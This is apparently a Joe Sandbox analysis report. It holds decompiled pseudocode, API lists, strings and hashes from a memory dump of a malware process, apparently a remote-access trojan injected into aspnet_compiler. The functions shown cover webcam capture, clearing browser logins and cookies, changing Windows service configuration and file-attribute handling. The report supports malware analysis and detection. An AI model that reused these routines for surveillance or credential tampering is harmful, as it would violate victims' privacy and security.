                											__eflags = _t139;
                											if(__eflags > 0) {
                												goto L44;
                											}
                											if(__eflags < 0) {
                												goto L48;
                											}
                											__eflags = _t131;
                											if(_t131 >= 0) {
                												goto L44;
                											}
                											goto L48;
                										}
                										goto L42;
                									}
                								}
                								_push(_t155);
                								_t102 = E00447E71(_t120, _t147, _t155, __eflags);
                								__eflags = _t102;
                								if(_t102 == 0) {
                									goto L32;
                								}
                								_t80 = _v8 + _v16;
                								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                								goto L33;
                							}
                							if(__eflags > 0) {
                								L20:
                								_t104 = 7;
                								__eflags = _t118 - _t104;
                								if(__eflags > 0) {
                									goto L28;
                								}
                								if(__eflags < 0) {
                									L23:
                									asm("cdq");
                									_push( &_v24);
                									asm("sbb ebx, edx");
                									_v24 = _t128 - _v8;
                									_push(_t155);
                									_v20 = _t118;
                									_t78 = E00441327();
                									__eflags = _t78;
                									if(_t78 != 0) {
                										goto L11;
                									}
                									__eflags = _v12 - _t78;
                									if(__eflags == 0) {
                										goto L44;
                									}
                									_push(_t155);
                									_t107 = E00447E71(_t118, _t145, _t155, __eflags);
                									__eflags = _t107;
                									if(_t107 == 0) {
                										goto L44;
                									}
                									asm("cdq");
                									_v24 = _v24 - _v16;
                									_push( &_v24);
                									asm("sbb [ebp-0x10], edx");
                									_push(_t155);
                									_t78 = E00441327();
                									__eflags = _t78;
                									if(_t78 != 0) {
                										goto L11;
                									}
                									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                									goto L44;
                								}
                								__eflags = _t128 - 0x933c7b7f;
                								if(_t128 >= 0x933c7b7f) {
                									goto L28;
                								}
                								goto L23;
                							}
                							__eflags = _t128 - 0x3f480;
                							if(_t128 <= 0x3f480) {
                								goto L28;
                							}
                							goto L20;
                						}
                					}
                				}
                				_push(0);
                				_push(0);
                				_push(0);
                				_push(0);
                				_push(0);
                				E0043A5E8();
                				asm("int3");
                				_push(_t155);
                				_t69 = E004412C2(_t125);
                				_t156 = _t69;
                				__eflags = _t156;
                				if(_t156 != 0) {
                					_push(_v0);
                					_t70 = E004393DC(0, _t139, _t145, _t156);
                					asm("sbb eax, eax");
                					_t73 =  !( ~_t70) & _t156;
                					__eflags = _t73;
                					return _t73;
                				}
                				return _t69;
                			}

                APIs
                • __allrem.LIBCMT ref: 00439569
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439585
                • __allrem.LIBCMT ref: 0043959C
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395BA
                • __allrem.LIBCMT ref: 004395D1
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395EF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                • String ID:
                • API String ID: 1992179935-0
                • Opcode ID: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                • Instruction ID: e4b6510059702768e302587ffc0a9b2f327eb02b25cf372d85322d71f2147457
                • Opcode Fuzzy Hash: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                • Instruction Fuzzy Hash: BE815B72600B02ABE7249F79CC42B6B73A9AF58328F24552FF411D7381E7B8DD418B58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00404351(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
                				char _v4;
                				void* _v36;
                				char _v40;
                				char _v48;
                				char _v52;
                				char _v56;
                				char _v72;
                				void* __esi;
                				void* _t24;
                				char** _t26;
                				intOrPtr* _t28;
                				char* _t36;
                				intOrPtr _t46;
                				signed int _t55;
                				signed int _t57;
                				char* _t60;
                				void* _t63;
                				signed int _t64;
                				void* _t66;
                				signed int _t75;
                				void* _t78;
                				void* _t127;
                				signed int _t129;
                				signed int _t131;
                				signed int _t133;
                				signed int _t134;
                				signed int _t135;
                				signed int _t136;
                				void* _t139;
                				signed int _t140;
                				char* _t142;
                				signed int _t144;
                				void* _t147;
                				void* _t148;
                				intOrPtr* _t149;
                
                				_push(__edi);
                				_t122 = _a8;
                				_t127 = __ecx;
                				_t24 = E0040278C(__ecx, _a8);
                				_t78 = _t127;
                				_t156 = _t24;
                				if(_t24 == 0) {
                					_push(__ebx);
                					E00402868(_t78, __edx, _t139, 0);
                					_t26 = E0040221D();
                					_t75 = _a8;
                					_a4 = _t26;
                					_t117 =  *_t26;
                					__eflags =  !_t117 - _t75;
                					if( !_t117 <= _t75) {
                						E00402884(_t127, _t139);
                						asm("int3");
                						_t140 = _t144;
                						_push(_t127);
                						_t28 = E00401F8B( &_v4);
                						E00404182( &_v4,  &_v40, 4, 0xffffffff);
                						_t147 = (_t144 & 0xfffffff8) - 0xc;
                						E004020D6(_t75, _t147, _t117, __eflags, 0x472ec8);
                						_t148 = _t147 - 0x18;
                						E004020D6(_t75, _t148, _t117, __eflags,  &_v56);
                						E0041A976( &_v72, _t117);
                						_t149 = _t148 + 0x30;
                						_t129 =  *_t28 - 0x3c;
                						__eflags = _t129;
                						if(__eflags == 0) {
                							E00401E45( &_v48, _t117, _t140, __eflags, 0);
                							_t36 = E0040245C();
                							E00401F8B(E00401E45( &_v52, _t117, _t140, __eflags, 0));
                							_t117 = _t36;
                							_t131 = E00411235();
                							__eflags = _t131;
                							if(_t131 != 0) {
                								 *0x470ad4 = E004114AA(_t131, "OpenCamera");
                								 *0x470ad0 = E004114AA(_t131, "CloseCamera");
                								_t46 = E004114AA(_t131, "GetFrame");
                								_t117 = "FreeFrame";
                								 *0x470ad8 = _t46;
                								 *0x470acc = E004114AA(_t131, "FreeFrame");
                								 *0x470aba = 1;
                								E004020D6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x472e30);
                								_push(0x1b);
                								goto L23;
                							}
                						} else {
                							_t133 = _t129 - 1;
                							__eflags = _t133;
                							if(_t133 == 0) {
                								__eflags =  *0x470a87;
                								if(__eflags != 0) {
                									goto L20;
                								}
                							} else {
                								_t134 = _t133 - 1;
                								__eflags = _t134;
                								if(_t134 == 0) {
                									 *0x470ad0();
                									 *0x470a87 = 0;
                								} else {
                									_t135 = _t134 - 1;
                									__eflags = _t135;
                									if(_t135 == 0) {
                										_t55 =  *0x470ad4();
                										 *0x470a87 = _t55;
                										__eflags = _t55;
                										if(__eflags == 0) {
                											goto L15;
                										} else {
                											L20:
                											_t117 = E0043A3AC(_t50, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, 0)));
                											E004045E7(_a8, _t52, __eflags);
                										}
                									} else {
                										_t136 = _t135 - 1;
                										__eflags = _t136;
                										if(_t136 == 0) {
                											_t57 =  *0x470ad4();
                											 *0x470a87 = _t57;
                											__eflags = _t57;
                											if(__eflags == 0) {
                												L15:
                												E004020D6(_t75, _t149 - 0x18, _t117, __eflags, 0x472e30);
                												_push(0x41);
                												L23:
                												E00404A81(_a8, _t117, __eflags);
                											} else {
                												_t60 = E0043A3AC(_t58, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, _t136)));
                												 *_t149 = 0x3e8;
                												Sleep(??);
                												_t117 = _t60;
                												E004045E7(_a8, _t60, __eflags);
                												 *0x470ad0();
                											}
                										}
                									}
                								}
                							}
                						}
                						_t21 =  &_v48; // 0x472e30
                						E00401E6D(_t21, _t117);
                						E00401FB8();
                						E00401FB8();
                						__eflags = 0;
                						return 0;
                					} else {
                						_push(_t139);
                						_t142 =  &(_t117[_t75]);
                						__eflags = _t75;
                						if(_t75 != 0) {
                							_t64 = E004027C6(_t75, _t127, _t117, _t122, _t142, 0);
                							__eflags = _t64;
                							if(_t64 != 0) {
                								_t66 = E0040220A(_t127);
                								E004015A6(E0040220A(_t127) + _t75 * 2, _t66,  *_a8);
                								E00401592(E0040220A(_t127), _t122, _t75);
                								E00402837(_t142);
                							}
                						}
                						_t63 = _t127;
                						goto L7;
                					}
                				} else {
                					_push(_a12);
                					_t63 = E004034C6(__ebx, _t127, __edx, _t122 - E0040220A(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E0040220A(_t78) >> 1);
                					L7:
                					return _t63;
                				}
                			}


                APIs
                  • Part of subcall function 00402884: std::_Xinvalid_argument.LIBCPMT ref: 00402889
                • Sleep.KERNEL32(00000000,0040C76B), ref: 004044A4
                  • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: H_prologSleepXinvalid_argumentstd::_
                • String ID: 0.G$CloseCamera$FreeFrame$GetFrame$OpenCamera
                • API String ID: 834325642-106669708
                • Opcode ID: 72b5cf57360f8c7f7f9965ee022148322bdef0c3ee28f50ca2ace154a928cca6
                • Instruction ID: ecedd063232be1ac5acd44a52b85944b2f12cafd62aea4fc44177e9967f66efd
                • Opcode Fuzzy Hash: 72b5cf57360f8c7f7f9965ee022148322bdef0c3ee28f50ca2ace154a928cca6
                • Instruction Fuzzy Hash: 6E51E571A04300ABC614FB769D5AA6E37959BD0714F00453FFA0A772E2DF7C8A45839E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E004441FA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				char _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				char* _v44;
                				char _v48;
                				void* __ecx;
                				signed int _t67;
                				signed int _t70;
                				signed int _t71;
                				signed int _t75;
                				intOrPtr _t76;
                				signed int _t79;
                				signed int _t86;
                				intOrPtr _t88;
                				signed int _t99;
                				void* _t101;
                				void* _t103;
                				void* _t108;
                				signed int _t112;
                				signed int _t113;
                				signed int _t116;
                				signed int _t123;
                				signed int _t125;
                				intOrPtr _t126;
                				signed int _t128;
                				intOrPtr _t130;
                				signed int _t131;
                				void* _t135;
                				void* _t136;
                				void* _t138;
                
                				_t120 = __edx;
                				_t97 = __ebx;
                				_push(_t101);
                				if(_a8 != 0) {
                					_push(__esi);
                					_push(__edi);
                					_t123 = 0;
                					_t67 = E0043F7BD( &_v8, 0, 0, _a8, 0x7fffffff);
                					_t136 = _t135 + 0x14;
                					__eflags = _t67;
                					if(_t67 == 0) {
                						L5:
                						_t128 = E004443F4(_t101, _v8, 2);
                						_pop(_t103);
                						__eflags = _t128;
                						if(_t128 == 0) {
                							L11:
                							E00445002(_t128);
                							_t70 = _t123;
                							goto L12;
                						} else {
                							_t71 = E0043F7BD(_t123, _t128, _v8, _a8, 0xffffffff);
                							_t136 = _t136 + 0x14;
                							__eflags = _t71;
                							if(_t71 == 0) {
                								_t123 = E0044357C(_t97, _t103, _t120, _a4, _t128);
                								goto L11;
                							} else {
                								__eflags = _t71 - 0x16;
                								if(_t71 == 0x16) {
                									goto L13;
                								} else {
                									__eflags = _t71 - 0x22;
                									if(_t71 != 0x22) {
                										goto L11;
                									} else {
                										goto L13;
                									}
                								}
                							}
                						}
                					} else {
                						__eflags = _t67 - 0x16;
                						if(_t67 == 0x16) {
                							L13:
                							_push(_t123);
                							_push(_t123);
                							_push(_t123);
                							_push(_t123);
                							E0043A5E8();
                							asm("int3");
                							E00433700(0x46c970, 0x1c);
                							_t130 = _a4;
                							_t75 = E004441FA(_t97, _t120, _t123, _t130, _t130, _a8);
                							_t108 = _t123;
                							_t125 = _t75;
                							__eflags = _t125;
                							if(_t125 != 0) {
                								_t76 = E00446A95(_t97, _t108, _t120);
                								_v40 = _t76;
                								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                								_v32 = 0;
                								_t79 = E0043FEEB( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                								_t138 = _t136 + 0x18;
                								__eflags = _t79;
                								if(_t79 == 0) {
                									L22:
                									_t99 = E00444A38(_t110, _v32 + 4);
                									__eflags = _t99;
                									if(_t99 == 0) {
                										goto L15;
                									} else {
                										_t20 = _t99 + 4; // 0x4
                										_v36 = _t20;
                										_t110 =  &_v48;
                										_t125 = 0;
                										_t86 = E0043FEEB( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                										_t138 = _t138 + 0x18;
                										__eflags = _t86;
                										if(_t86 == 0) {
                											L29:
                											_t126 = _v48;
                											E00444189(4);
                											_pop(_t112);
                											_v8 = _v8 & 0x00000000;
                											_t131 = _t130 + _t130;
                											_t113 = _t112 | 0xffffffff;
                											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                											if(__eflags != 0) {
                												asm("lock xadd [edx], eax");
                												if(__eflags == 0) {
                													E00445002( *(_t126 + 0x24 + _t131 * 8));
                													_pop(_t116);
                													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                													_t113 = _t116 | 0xffffffff;
                													__eflags = _t113;
                												}
                											}
                											_t88 = _v40;
                											__eflags =  *(_t88 + 0x350) & 0x00000002;
                											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                												__eflags =  *0x46f9a4 & 0x00000001;
                												if(( *0x46f9a4 & 0x00000001) == 0) {
                													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                														asm("lock xadd [eax], ecx");
                														__eflags = _t113 == 1;
                														if(_t113 == 1) {
                															E00445002( *(_t126 + 0x24 + _t131 * 8));
                															_t51 = _t126 + 0x24 + _t131 * 8;
                															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                															__eflags =  *_t51;
                														}
                													}
                												}
                											}
                											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                											_v8 = 0xfffffffe;
                											E004443EB();
                										} else {
                											__eflags = _t86 - 0x16;
                											if(_t86 == 0x16) {
                												L26:
                												_push(_t125);
                												_push(_t125);
                												_push(_t125);
                												_push(_t125);
                												_push(_t125);
                												goto L20;
                											} else {
                												__eflags = _t86 - 0x22;
                												if(_t86 != 0x22) {
                													__eflags = _t86;
                													if(_t86 == 0) {
                														goto L29;
                													} else {
                														E00445002(_t99);
                														goto L15;
                													}
                												} else {
                													goto L26;
                												}
                											}
                										}
                									}
                								} else {
                									__eflags = _t79 - 0x16;
                									if(_t79 == 0x16) {
                										L19:
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										L20:
                										_t79 = E0043A5E8();
                									} else {
                										__eflags = _t79 - 0x22;
                										if(_t79 == 0x22) {
                											goto L19;
                										}
                									}
                									__eflags = _t79;
                									if(_t79 != 0) {
                										goto L15;
                									} else {
                										goto L22;
                									}
                								}
                							} else {
                								L15:
                							}
                							return E00433746();
                						} else {
                							__eflags = _t67 - 0x22;
                							if(_t67 == 0x22) {
                								goto L13;
                							} else {
                								goto L5;
                							}
                						}
                					}
                				} else {
                					_t70 = E0044357C(__ebx, _t101, __edx, _a4, 0);
                					L12:
                					return _t70;
                				}
                			}


                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe
                • String ID:
                • API String ID: 4189289331-0
                • Opcode ID: bea48539c97404502ca8d342fb423c1747bb2e34920bcab85dac5bef24bcc09a
                • Instruction ID: 8fe28a21c22037a225050a123006aa5e814484bf9f3f78946cda57ab9d9a3774
                • Opcode Fuzzy Hash: bea48539c97404502ca8d342fb423c1747bb2e34920bcab85dac5bef24bcc09a
                • Instruction Fuzzy Hash: 2451EE72900505A7FF249F99CC42FAF77A8AF89774F20425FF81496292DB3DD900866C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00409C99(void* __ecx, long __edx) {
                				char _v1028;
                				char _v1040;
                				char _v1064;
                				char _v1076;
                				void* _v1088;
                				void* _v1092;
                				char _v1100;
                				char _v1124;
                				void* _v1132;
                				char _v1136;
                				void* _v1148;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				signed char _t32;
                				char* _t34;
                				void* _t36;
                				int _t40;
                				void* _t47;
                				int _t62;
                				void* _t64;
                				WCHAR* _t70;
                				void* _t71;
                				void* _t79;
                				void* _t134;
                				signed int _t136;
                				signed int _t139;
                
                				_t126 = __edx;
                				_t139 = _t136 & 0xfffffff8;
                				_t79 = __ecx;
                				_push(_t130);
                				_t134 = __ecx + 4;
                				do {
                					Sleep(0x1388);
                					E00409BE8(_t79, _t126);
                					_t126 = 0x46a8f0;
                					if(E00406E2B(_t139) != 0) {
                						if(E0040619C() == 0) {
                							CreateDirectoryW(E00401EE4(0x4730b8), 0);
                						}
                						_t128 = _t79 + 0x60;
                						_t32 = GetFileAttributesW(E00401EE4(_t79 + 0x60));
                						_t142 = _t32 & 0x00000002;
                						if((_t32 & 0x00000002) != 0) {
                							SetFileAttributesW(E00401EE4(_t128), 0x80);
                						}
                						_t34 = E00401F8B(E00401E45(0x473298, _t126, _t134, _t142, 0x12));
                						_t143 =  *_t34;
                						if( *_t34 != 0) {
                							E004020BF(_t79,  &_v1124);
                							_t36 = E0040245C();
                							E0040632B( &_v1028, E00401F8B(0x473280), _t36);
                							_t40 = PathFileExistsW(E00401EE4(_t128));
                							__eflags = _t40;
                							if(_t40 != 0) {
                								E004020BF(_t79,  &_v1100);
                								E00401EE4(_t128);
                								_t126 =  &_v1100;
                								_t62 = E0041ADFE( &_v1100);
                								__eflags = _t62;
                								if(_t62 != 0) {
                									_t64 = E0040245C();
                									E00401FC2( &_v1136,  &_v1100, _t130, E0040644C(_t79,  &_v1028,  &_v1100,  &_v1076, E00401F8B( &_v1100), _t64));
                									E00401FB8();
                								}
                								E00401FB8();
                							}
                							__eflags = E0040245C() + _t41;
                							L00403356(E00402097(_t79,  &_v1076, _t126, _t134, __eflags, E00401EE4(_t134), E0040245C() + _t41));
                							E00401FB8();
                							_t47 = E0040245C();
                							E0040644C(_t79,  &_v1040, _t126,  &_v1064, E00401F8B( &_v1136), _t47);
                							_t126 = E00401EE4(_t128);
                							E0041AE6B( &_v1076, _t51);
                							E00401FB8();
                							E00401FB8();
                						} else {
                							_t70 = E00401EE4(_t128);
                							_t71 = E0040245C();
                							_t132 = _t71;
                							_t130 = _t71 + _t132;
                							E00401EE4(_t134);
                							_t126 = _t71 + _t132;
                							E0041AD6A(_t71 + _t132, _t70, 1);
                						}
                						L004086CB(_t79, _t134, _t126, 0x46a8f0);
                						if( *((char*)(E00401F8B(E00401E45(0x473298, _t126, _t134, _t143, 0x13)))) != 0) {
                							SetFileAttributesW(E00401EE4(_t128), 6);
                						}
                					}
                				} while ( *((char*)(_t79 + 0x49)) != 0);
                				return 0;
                			}


                APIs
                • Sleep.KERNEL32(00001388), ref: 00409CB3
                  • Part of subcall function 00409BE8: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                  • Part of subcall function 00409BE8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                  • Part of subcall function 00409BE8: Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                  • Part of subcall function 00409BE8: CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409CEF
                • GetFileAttributesW.KERNEL32(00000000), ref: 00409D00
                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409D17
                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409D91
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046A8F0,?,00000000,00000000,00000000,00000000,00000000), ref: 00409E9A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                • String ID:
                • API String ID: 3795512280-0
                • Opcode ID: 5be445e5ea5054b0e1cd6de02bbe9d8e67b77a22bdc24bd22d610c221810c8ca
                • Instruction ID: a26b43d943647d041280ad137afe2d2b6888429955654135db8bde193f98b3d7
                • Opcode Fuzzy Hash: 5be445e5ea5054b0e1cd6de02bbe9d8e67b77a22bdc24bd22d610c221810c8ca
                • Instruction Fuzzy Hash: 35514D312043015BC714BB72D8A6ABF779A9F80308F04453FB946B72E3DE7D9D05869A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040B586(void* __edi) {
                				char _v5;
                				char _v6;
                				char _v7;
                				void* __ebx;
                				void* __ecx;
                				void* __ebp;
                				intOrPtr _t18;
                				void* _t36;
                				intOrPtr _t40;
                				char _t50;
                				void* _t52;
                				void* _t53;
                				signed int _t54;
                				signed int _t55;
                				void* _t56;
                
                				_t52 = __edi;
                				_t55 = _t54 & 0xfffffff8;
                				 *0x470b1a = 1;
                				Sleep( *0x470b28);
                				_v7 = 0;
                				_t36 = 0;
                				_v6 = 0;
                				_v5 = 0;
                				goto L1;
                				do {
                					do {
                						L1:
                						_t60 = _t36;
                						if(_t36 == 0) {
                							L2:
                							_t36 = E0040B463(_t60);
                						}
                						_t61 = _t36;
                						if(_t36 == 0) {
                							_t36 = E0040B2B1(_t50, _t52, _t61);
                						}
                						_t62 = _v6;
                						if(_v6 == 0) {
                							_v6 = E0040B0AA(_t36, _t50, _t52, _t62);
                						}
                						_t63 = _v7;
                						if(_v7 == 0) {
                							_v7 = E0040B01B(_t50, _t52, _t63);
                						}
                						_t50 = _v5;
                						_t64 = _t50;
                						if(_t50 == 0) {
                							_t50 = E0040AF8C(_t50, _t52, _t64);
                							_v5 = _t50;
                						}
                						if(_t36 == 0 || _t36 == 0) {
                							L16:
                							Sleep(0x1388);
                							_t18 = _v7;
                							_t40 = _v6;
                							_t50 = _v5;
                						} else {
                							_t18 = _v7;
                							if(_t18 == 0 || _t50 == 0) {
                								goto L16;
                							} else {
                								_t40 = _v6;
                								if(_t40 == 0) {
                									goto L16;
                								}
                							}
                						}
                						if(_t36 == 0) {
                							goto L2;
                						}
                					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                					_t74 = _t40;
                				} while (_t40 == 0);
                				_t56 = _t55 - 0x18;
                				E00402073(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
                				E0040B752(_t36, _t50, _t53, _t74);
                				E00402073(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
                				_t57 = _t56 - 0x18;
                				E00402073(_t36, _t56 - 0x18, _t50, _t53, "i");
                				E0041A04A(_t36, _t52);
                				E00402073(_t36, _t57 + 0x18, _t50, _t53, 0x464074);
                				_push(0xaf);
                				E00404A81(0x4734e8, _t50, _t74);
                				if( *0x470b19 != 0) {
                					E00412B5F(0x473238, E00401F8B(0x473238), "FR", 1);
                				}
                				 *0x470b1a = 0;
                				return 0;
                 			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: [Cleared browsers logins and cookies.]$82G$Cleared browsers logins and cookies.$4G
                • API String ID: 3472027048-2766125209
                • Opcode ID: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                • Instruction ID: b4021fb9e4edc30202d34e01d01bd8d1c2d2826e69326faececa9b35d7d9af25
                • Opcode Fuzzy Hash: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                • Instruction Fuzzy Hash: D831860474C3806DDA116B7558667AB6F928EA3758F0844FFB8C4273C3DA7B490993AF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E004197D3(signed char __ecx, char _a4) {
                				signed char _v5;
                				void* _t7;
                				signed int _t11;
                				void* _t17;
                				short* _t21;
                				signed int _t24;
                				int _t25;
                				void* _t28;
                				void* _t31;
                
                				_push(__ecx);
                				_t21 = 0;
                				_v5 = __ecx;
                				_t7 = OpenSCManagerW(0, 0, 2);
                				_t24 =  &_a4;
                				_t31 = _t7;
                				_t28 = OpenServiceW(_t31, E00401EE4(_t24), 2);
                				if(_t28 != 0) {
                					_t25 = _t24 | 0xffffffff;
                					_t11 = _v5 & 0x000000ff;
                					if(_t11 == 0) {
                						_push(4);
                						goto L8;
                					} else {
                						_t17 = _t11 - 1;
                						if(_t17 == 0) {
                							_push(2);
                							goto L8;
                						} else {
                							if(_t17 == 1) {
                								_push(3);
                								L8:
                								_pop(_t25);
                							}
                						}
                					}
                					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                					CloseServiceHandle(_t31);
                					CloseServiceHandle(_t28);
                				} else {
                					CloseServiceHandle(_t31);
                				}
                				E00401EE9();
                				return _t21;
                 			}

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418EE9,00000000), ref: 004197E3
                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418EE9,00000000), ref: 004197F7
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 00419804
                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418EE9,00000000), ref: 00419839
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984B
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                • String ID:
                • API String ID: 493672254-0
                • Opcode ID: 0685ee7683545c8fe4094fdd631725e3e0c03e6f2c1836bfabfed0fff3afeb22
                • Instruction ID: a47b9f36788e1574db55dd564176aee803a97132f2343e107bd38cafad37238b
                • Opcode Fuzzy Hash: 0685ee7683545c8fe4094fdd631725e3e0c03e6f2c1836bfabfed0fff3afeb22
                • Instruction Fuzzy Hash: 280149311592147AD6146B34AC6EEBB3B9CDB03770F10033BF525921D2DA68CD45C1E9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00446A95(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0x46f1dc; // 0x6
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E004443F4(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E00447092(_t25, _t36, __eflags,  *0x46f1dc, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00446907(_t25, _t31, 0x470664);
                							E00445002(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00445002();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E004449F5(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x46f1dc; // 0x6
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E004443F4(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E00447092(_t27, _t37, __eflags,  *0x46f1dc, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00446907(_t27, _t32, 0x470664);
                									E00445002(_t21);
